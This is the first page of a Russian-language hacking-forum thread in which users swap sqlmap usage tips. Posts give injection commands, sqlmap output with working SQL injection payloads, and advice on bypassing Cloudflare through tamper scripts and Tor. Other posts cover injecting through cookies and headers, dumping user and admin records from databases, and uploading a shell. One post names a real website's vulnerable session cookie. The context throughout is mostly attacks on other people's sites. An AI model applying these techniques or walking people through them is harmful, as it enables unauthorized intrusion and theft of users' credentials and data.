Форум АНТИЧАТ
Страница 1 из 29 1 2 3 4 5 11 > Последняя »
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Вопросы по SQLMap (https://forum.antichat.xyz/showthread.php?t=431199)

XAMEHA 01.10.2015 04:01
Вопросы по SQLmap и Havij оставляем только здесь

Вопросы в других темах будут переноситься сюда или удаляться. Пожалуйста, не забывайте использовать тег [CODE].

Официально руководство: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Code Hunter 07.10.2015 13:14
Очень актуальная тема для меня сейчас.

Прошу помочь определится, в чем разница кроме интерфейса между sqlmap и sqli dumper?

-=Cerberus=- 07.10.2015 14:15


vikler Member


тебе поможет --help и изучи возможности

https://github.com/sqlmapproject/sql.../master/tamper в частности помогает вот этот скрипт частенько space2mssqlblank.py



Code Hunter New Member


sqlmap это швейцарский нож, думаю больше ничего аргументировать и не надо

vikler 07.10.2015 15:16
Цитата:
Сообщение от -=Cerberus=-
-=Cerberus=- said:



vikler Member

тебе поможет --help и изучи возможности
https://github.com/sqlmapproject/sql.../master/tamper
в частности помогает вот этот скрипт частенько
space2mssqlblank.py


Code Hunter New Member

sqlmap это швейцарский нож, думаю больше ничего аргументировать и не надо
Я использовала сто раз tamper scripts, но тут же оракл, а они для mysql/mssql

sysjuk 07.10.2015 16:02
Как через sqlmap обойти можно cloudflare?

strelok20094 08.10.2015 02:10
Цитата:
Сообщение от sysjuk
sysjuk said:

Как через sqlmap обойти можно cloudflare?
First of all, you need to make sure the target site is protected by Cloudflare, you can add "--identify-waf" or "--check-waf" to confirm. However, do not set "--thread=" larger than 1 as the target will give you "403 Forbidden" error. Once you get the "403 error", your IP address is banned. Therefore, you are required to consider to use proxy servers or TOR to access the target.

Secondary, you need to add "--tamper='between,randomcase,space2comment'" and "-v 3", if the target is confirmed being protected by Cloudflare. You may also consider to add "--random-agent" and "--tor" when necessary.

Прежде всего, вы должны убедиться, что целевой сайт защищен Cloudflare, вы можете добавить "--identify-WAF" или "--check-WAF" для подтверждения. Не используй "--thread =" больше, 1 потока тк это даст вам "403 Forbidden" сообщение об ошибке. Как только вы получите "ошибку" 403, Ваш IP будет запрещен. Таким образом, вы должны рассмотреть возможность использования прокси-серверов или TOR для доступа к цели.

Второе что, вам нужно добавить "--tamper = 'between,randomcase,space2comment'" и "-v 3", в принципе этого будет достаточно чтобы cloudflare отьебался. Вы также можете рассмотреть вариант с добавлением "--random-агент" и "--tor", когда это необходимо.

sysjuk 10.10.2015 10:22
Есть еще вопрос, как допустим сдампить правильно сдампить таблицу с определенного столбца, допустим в бд 10000юзеров, мне нужно с 5000 начать дампить, как это сделать?

и еще, как сдампить конкретно админов по группам.

faza02 10.10.2015 12:08
Цитата:
Сообщение от sysjuk
sysjuk said:

Есть еще вопрос, как допустим сдампить правильно сдампить таблицу с определенного столбца, допустим в бд 10000юзеров, мне нужно с 5000 начать дампить, как это сделать?
и еще, как сдампить конкретно админов по группам.
--where="условие" типа userid>5000, только с реальным именем колонки

grimnir 11.10.2015 21:07
Цитата:
Сообщение от sysjuk
sysjuk said:

10000юзеров, мне нужно с 5000 начать дампить, как это сделать?
и еще, как сдампить конкретно админов по группам.
--start=5000

--sql-shell далее пишем запрос как при обычной выборке SELECT mail,pass,etc FROM base.table WHERE условие критерия админа

Админы прикрепите пожалуйста официальное руководство в тему вверху,то одни и те же вопросы.

https://github.com/sqlmapproject/sqlmap/wiki/Usage

BabaDook 11.10.2015 21:44
Цитата:
Сообщение от grimnir
grimnir said:

--start=5000
--sql-shell далее пишем запрос как при обычной выборке SELECT mail,pass,etc FROM base.table WHERE условие критерия админа
Админы прикрепите пожалуйста официальное руководство в тему вверху,то одни и те же вопросы.
https://github.com/sqlmapproject/sqlmap/wiki/Usage
sql-qure="запрос"

kacergei 12.10.2015 01:52
Подскажите перепробовал уже тьму вариантов, как можно нормально вытащить таблички и колонки (не перебирая по списку)

.SpoilerTarget" type="button">Spoiler: Открыть/закрыть

Код:
Code:
sqlmap.py -u "http://site.com/" --headers="X-Forwarded-Host:*" -D db_site --tables
[00:48:09] [INFO] resuming back-end DBMS 'mysql'
[00:48:09] [INFO] testing connection to the target URL
[00:48:09] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: X-Forwarded-Host #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: -3650') OR 8491=8491 AND ('uAYR'='uAYR

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: ');(SELECT * FROM (SELECT(SLEEP(5)))WjQQ)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ') AND (SELECT * FROM (SELECT(SLEEP(5)))hXGz) AND ('hNrS'='hNrS
---
back-end DBMS: MySQL >= 5.0.0
banner:    '5.6.19-log'
[00:48:20] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q]
Перебирая не находит то что нужно( бд по букве хоть но вывел

а так: [ERROR] unable to retrieve the table names for any database

grimnir 12.10.2015 09:24
Цитата:
Сообщение от kacergei
kacergei said:

Перебирая не находит то что нужно( бд по букве хоть но вывел
а так:
[ERROR] unable to retrieve the table names for any database
Попробуйте варианты

sqlmap.py -u "http://site.com/" --headers="X-Forwarded-Host:*" -D db_site --tables --technique=B --hex -v3 --is-dba

sqlmap.py -u "http://site.com/" --headers="X-Forwarded-Host:*" -D db_site --tables --technique=B --no-cast -v3

посмотреть причину ошибки по логу или возможно, нет прав

ol1ver 12.10.2015 21:22
Господа хорошие, подскажите пожалуйста.

Пытаюсь крутить скулю через cookie (именно подсавлять в куке), но нахожу статьи только как авторизоваться. Ошибка что выдает говорит мне - идиот, я же в get ищу, а что искать?

И правильно ли я формирую запрос (http)?

Спасибо.

http://screenshotuploader.com/i/1510/hsw-k.png

private_static 13.10.2015 08:13
Цитата:
Сообщение от ol1ver
ol1ver said:

Господа хорошие, подскажите пожалуйста.
Пытаюсь крутить скулю через cookie (именно подсавлять в куке), но нахожу статьи только как авторизоваться. Ошибка что выдает говорит мне - идиот, я же в get ищу, а что искать?
И правильно ли я формирую запрос (http)?
Спасибо.
http://screenshotuploader.com/i/1510/hsw-k.png
попробуйте убрать -p "login" и в куках которые вы указали после значения логина добавить символ *

должно получиться чтото вроде --cookie="login=mylogin*"

Waki 13.10.2015 11:12
Цитата:
Сообщение от ol1ver
ol1ver said:

Господа хорошие, подскажите пожалуйста.
Пытаюсь крутить скулю через cookie (именно подсавлять в куке), но нахожу статьи только как авторизоваться. Ошибка что выдает говорит мне - идиот, я же в get ищу, а что искать?
И правильно ли я формирую запрос (http)?
Спасибо.
http://screenshotuploader.com/i/1510/hsw-k.png
добавь --level=2

https://github.com/sqlmapproject/sqlmap/wiki/Usage

Цитата:
Сообщение от None
Note that also the HTTP Cookie header is tested against SQL injection if the --level is set to
2
or above.

WallHack 13.10.2015 16:29
Можно ли sqlmap сканнировать такой запрос:

sqlmap.py -u "site.ru/add/%27"

Или какой софт сканерует такой запрос ?

xivi00 13.10.2015 17:43
WallHack присоединяюс тоже интересно

private_static 13.10.2015 17:52
Цитата:
Сообщение от WallHack
WallHack said:

Можно ли sqlmap сканнировать такой запрос:
sqlmap.py -u "site.ru/add/%27"
Или какой софт сканерует такой запрос ?
sqlmap.py -u "site.ru/add/*"

gmiller 13.10.2015 18:05
Попробуй sqlmap.py -u "site.ru/add/*"

strelok20094 13.10.2015 18:44
Цитата:
Сообщение от gmiller
gmiller said:

Попробуй sqlmap.py -u "site.ru/add/*"
Цитата:
Сообщение от xivi00
xivi00 said:

WallHack
присоединяюс тоже интересно
Цитата:
Сообщение от WallHack
WallHack said:

Можно ли sqlmap сканнировать такой запрос:
sqlmap.py -u "site.ru/add/%27"
Или какой софт сканерует такой запрос ?
Что это за бред? Обычная sql льется без проблем, вместо %27'' ставишь * и льешь

RedFern.89 15.10.2015 02:17
Код:
Code:
http://prodota.ru/news/
Cookie: __cfduid=dd4763d374e8cfb5cbdfd45ca7737dd151443527442; session_id=1;
уязвим параметр session_id, sqlmap не может раскрутить, в чем проблема?

и еще вопрос, как быть если уязвимый параметр X-Forwarded-For?

grimnir 15.10.2015 05:35
Цитата:
Сообщение от RedFern.89
RedFern.89 said:

Код:
Code:
http://prodota.ru/news/
Cookie: __cfduid=dd4763d374e8cfb5cbdfd45ca7737dd151443527442; session_id=1;
уязвим параметр session_id, sqlmap не может раскрутить, в чем проблема?
--url=
http://prodota.ru/news/
--cookie=__cfduid=dd4763d374e8cfb5cbdfd45ca7737dd151 443527442; session_id=1*;
и еще вопрос, как быть если уязвимый параметр X-Forwarded-For?
--headers="X-Forwarded-For: *"

RedFern.89 15.10.2015 10:51
Цитата:
Сообщение от grimnir
grimnir said:

--headers="X-Forwarded-For: *"
а по поводу первого вопроса?

grimnir 15.10.2015 19:15
Цитата:
Сообщение от RedFern.89
RedFern.89 said:

а по поводу первого вопроса?
Не знаю,я сайты не ломаю

ButilkaSoka 17.10.2015 21:36
содержимое колонки типа blob, в процессе дампа символы в другой кодировке, как вывести данный тип?

.SpoilerTarget" type="button">Spoiler
http://6.firepic.org/6/images/2015-1...rgx7om9ja7.png
процесс дампа

.SpoilerTarget" type="button">Spoiler
http://6.firepic.org/6/images/2015-1...c5x8c07zer.png http://6.firepic.org/6/images/2015-1...mvf73fw5gi.png

xivi00 19.10.2015 17:22
Если кому не трудно распишите все способы залива шела через sqlmap и так же ключи для раскрытия путей чтения файлов, очень долго с этим мучаюсь немогу разобраться

ol1ver 21.10.2015 15:51
Раз и вдруг sqlmap перестал работать. На ввод команд не реагирует. С Python все нормально, ничего не переносил. С АВ sqlmap дружил.

http://screenshotuploader.com/i/1510/bzm_t.png

xivi00 21.10.2015 16:16
Цитата:
Сообщение от ol1ver
ol1ver said:

Раз и вдруг sqlmap перестал работать. На ввод команд не реагирует. С Python все нормально, ничего не переносил. С АВ sqlmap дружил.
http://screenshotuploader.com/i/1510/bzm_t.png
такое бывает.удали папку и скачай по новой sqlmap и все заработает

ol1ver 21.10.2015 18:20
Цитата:
Сообщение от xivi00
xivi00 said:

такое бывает.удали папку и скачай по новой sqlmap и все заработает
ага

Цитата:
Сообщение от None
[11:50:05] [INFO] retrieved: ???????????????
[11:50:05] [INFO] retrieving the length of query output
[11:50:05] [INFO] retrieved: 9
[11:50:20] [INFO] retrieved: ?????????
[11:50:20] [INFO] retrieving the length of query output
[11:50:20] [INFO] retrieved: 6
Уважаемые, делаю дамп таблицы. Как с этим бороться? Можно самому задать кодировку вывода?

xivi00 21.10.2015 18:38
Цитата:
Сообщение от ol1ver
ol1ver said:

ага
Уважаемые, делаю дамп таблицы. Как с этим бороться? Можно самому задать кодировку вывода?
Правельно мыслишь)А лучше сливай дампером а не sqlmap

ol1ver 22.10.2015 01:54
http://screenshotuploader.com/i/1510/9-k6q.png

Уважаемые, кто нибудь использовал советы (что в красной рамке)? Думал вот вот раскручу - fail.

vikler 31.10.2015 00:42
Цитата:
Сообщение от ol1ver
ol1ver said:

http://screenshotuploader.com/i/1510/9-k6q.png
Уважаемые, кто нибудь использовал советы (что в красной рамке)? Думал вот вот раскручу - fail.
Ну ты вручную посмотри, есть там что раскручивать или нет! Значит просто ничего нет

ЛИБО, если вручную можешь, то в зависимтои от того, какой вид уязвимости. Иногда надо под высоким risk/level

--risk 3 --level 5

xivi00 01.11.2015 17:49
Как правельно в sqlmap е крутить error bazed что то даже хавидж справляеться а он нет)

ol1ver 03.11.2015 00:25
Как можно вытащить значение из ячейки? Грешу что криптуется AES (а ключа я не знаю). В mysql запросах не силен.

Как бороться? Спасибо!

Знаю что значение состоит из 16и знаков (integer), может брут?

http://screenshotuploader.com/i/1511/q1gx8.png

vikler 04.11.2015 06:41
Цитата:
Сообщение от ol1ver
ol1ver said:

Как можно вытащить значение из ячейки? Грешу что криптуется AES (а ключа я не знаю). В mysql запросах не силен.
Как бороться? Спасибо!
Знаю что значение состоит из 16и знаков (integer), может брут?
http://screenshotuploader.com/i/1511/q1gx8.png
Надо так

./sqlmap.py -u "url" --binary-fields=COLUMN_NAME --sql-shell

А дальше делать твой SELECT COLUMN_NAME from Customeres ну и т.д.

Судя по выводу данные хранятся в двоичном представлении. Я так мучилась долго с одним сайтом. Потом просто указала, что данные из проблемной колонки выводить в двоичном представлении, и нормально всё вышло

errorbaser 04.11.2015 09:00
Подскажите пожалуйста, как можно указать две url в sqlmap. Одну для отправки инъекции, вторую для чтения ошибки.

xivi00 04.11.2015 19:08
./sqlmap.py -u "url" -v 3

private_static 04.11.2015 20:20
Цитата:
Сообщение от errorbaser
errorbaser said:

Подскажите пожалуйста, как можно указать две url в sqlmap. Одну для отправки инъекции, вторую для чтения ошибки.
Код:
Code:
sqlmap.py -u "http://example.com/test.php?id=1" --second-order="http://example.com/result.php"

Sloommmik 13.11.2015 11:49
Привет друзья. Подскажите, как сохранить дамп в sqlmap?

Можно ли сейвить в процессе слива или нужно стопать?

kacergei 14.11.2015 06:58
Понадобилось первый раз слить всю таблицу, в ней 10К+ записей

Но проблема в том что сайт иногда падает, да и мой пк тоже не подарок может в любой момент вырубиться

Суть вопроса, как сдампить что бы sqlmap сохранял с определенным интервалом (что бы если что продолжить)


Время: 04:58
Страница 1 из 29 1 2 3 4 5 11 > Последняя »
Показывать 40 сообщений этой темы на одной странице